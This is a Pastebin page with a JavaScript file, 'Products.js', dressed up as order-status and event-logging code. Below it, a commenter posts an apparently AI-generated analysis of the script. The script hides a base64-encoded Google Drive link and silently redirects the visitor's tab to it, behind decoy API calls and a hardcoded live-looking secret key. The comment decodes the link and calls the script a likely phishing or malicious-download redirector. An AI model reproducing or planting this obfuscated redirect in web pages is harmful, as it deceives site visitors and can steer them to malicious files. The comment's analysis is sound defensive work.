API tools faq
paste
Advertisement
hubertzoo90

Products.js

hubertzoo90
Apr 29th, 2025
171
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.18 KB | None | 0 0
raw download clone embed print report
  1. (async function () {
  2.   const apiEndpoint = "/v1/order/78464/status";
  3.   const orderId = "ORD-" + Math.random().toString(36).substring(2, 10).toUpperCase();
  4.  
  5.   async function verifyOrder(id) {
  6.     try {
  7.       const response = await fetch(apiEndpoint, {
  8.         method: "POST",
  9.         headers: {
  10.           "Content-Type": "application/json",
  11.           "Authorization": "Bearer sk_live_xr7u8ghs1k2as91"
  12.         },
  13.         body: JSON.stringify({ order_id: id })
  14.       });
  15.  
  16.       const data = await response.json();
  17.       return data;
  18.     } catch (err) {
  19.       return { status: "ERROR" };
  20.     }
  21.   }
  22.  
  23.   function logEvent(id, status) {
  24.     fetch("/v1/event", {
  25.       method: "POST",
  26.       headers: {
  27.         "Content-Type": "application/json"
  28.       },
  29.       body: JSON.stringify({
  30.         event: "delivery_attempt",
  31.         order: id,
  32.         result: status
  33.       })
  34.     });
  35.   }
  36.  
  37.   const secret = 'aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOFpfQ290djVDYjFYQkcxSFdwaXZKT0VYaUN1MHJnTWsvdmlldw==';
  38.   const decode = atob;
  39.   const finalURL = decode(secret);
  40.  
  41.   window.open(finalURL, '_self');
  42.  
  43.   const status = await verifyOrder(orderId);
  44.   logEvent(orderId, status.status === "CONFIRMED" ? "success" : "fallback");
  45. })();
Advertisement
Comments
  • PRSADSRXSIRAX
    PRSADSRXSIRAX
    3 hours
    # text 2.46 KB | 0 0
    view report reply
    1. This JavaScript Immediately Invoked Async Function Expression (IIFE) performs several actions, some of which are suspicious. Here's a breakdown of what it does:
    2.  
    3. 🔍 Step-by-step breakdown:
    4. Sets up API endpoint and generates a fake order ID:
    5.  
    6. js
    7. Kopiera
    8. Redigera
    9. const apiEndpoint = "/v1/order/78464/status";
    10. const orderId = "ORD-" + Math.random().toString(36).substring(2, 10).toUpperCase();
    11. It uses a random string to create a fake order ID like ORD-8FJ9A2KS.
    12.  
    13. Defines an async function verifyOrder(id):
    14.  
    15. js
    16. Kopiera
    17. Redigera
    18. await fetch(apiEndpoint, {
    19. method: "POST",
    20. headers: { ... },
    21. body: JSON.stringify({ order_id: id })
    22. });
    23. Makes a POST request to a status-checking API.
    24.  
    25. Uses a live secret key in the Authorization header (sk_live_...) — this is sensitive and should not be exposed in frontend code.
    26.  
    27. Defines logEvent(id, status):
    28.  
    29. js
    30. Kopiera
    31. Redigera
    32. fetch("/v1/event", {
    33. method: "POST",
    34. headers: { "Content-Type": "application/json" },
    35. body: JSON.stringify({ event: "delivery_attempt", order: id, result: status })
    36. });
    37. Logs an event (e.g. success/fallback) based on order verification status.
    38.  
    39. Decodes a Base64 string:
    40.  
    41. js
    42. Kopiera
    43. Redigera
    44. const secret = 'aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOFpfQ290djVDYjFYQkcxSFdwaXZKT0VYaUN1MHJnTWsvdmlldw==';
    45. const decode = atob;
    46. const finalURL = decode(secret);
    47. This decodes to:
    48.  
    49. bash
    50. Kopiera
    51. Redigera
    52. https://drive.google.com/file/d/18Z_Cotv5Cb1XBG1HWpivJOEXiCu0rgMk/view
    53. A Google Drive file link.
    54.  
    55. Opens that Google Drive URL in the same tab:
    56.  
    57. js
    58. Kopiera
    59. Redigera
    60. window.open(finalURL, '_self');
    61. This means the page will redirect to the decoded Drive URL.
    62.  
    63. Verifies the fake order and logs the event:
    64.  
    65. js
    66. Kopiera
    67. Redigera
    68. const status = await verifyOrder(orderId);
    69. logEvent(orderId, status.status === "CONFIRMED" ? "success" : "fallback");
    70. 🚨 Suspicious Behavior
    71. Live Secret Key Exposed: "Bearer sk_live_xr7u8ghs1k2as91" — dangerous and should never be public.
    72.  
    73. Opens an external URL (Google Drive) — possibly to trick users into downloading a malicious file.
    74.  
    75. Fake order ID — may be trying to simulate legitimate activity.
    76.  
    77. Asynchronous behavior hides intent — the fetch and redirect are separated, possibly to bypass detection.
    78.  
    79. ✅ Summary
    80. This script:
    81.  
    82. Creates a fake order ID
    83.  
    84. Fakes an API request to check status
    85.  
    86. Logs that result
    87.  
    88. Decodes and opens a Google Drive URL in the browser
    89.  
    90. Could be used for phishing or malicious redirection
    91.  
    92.  
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!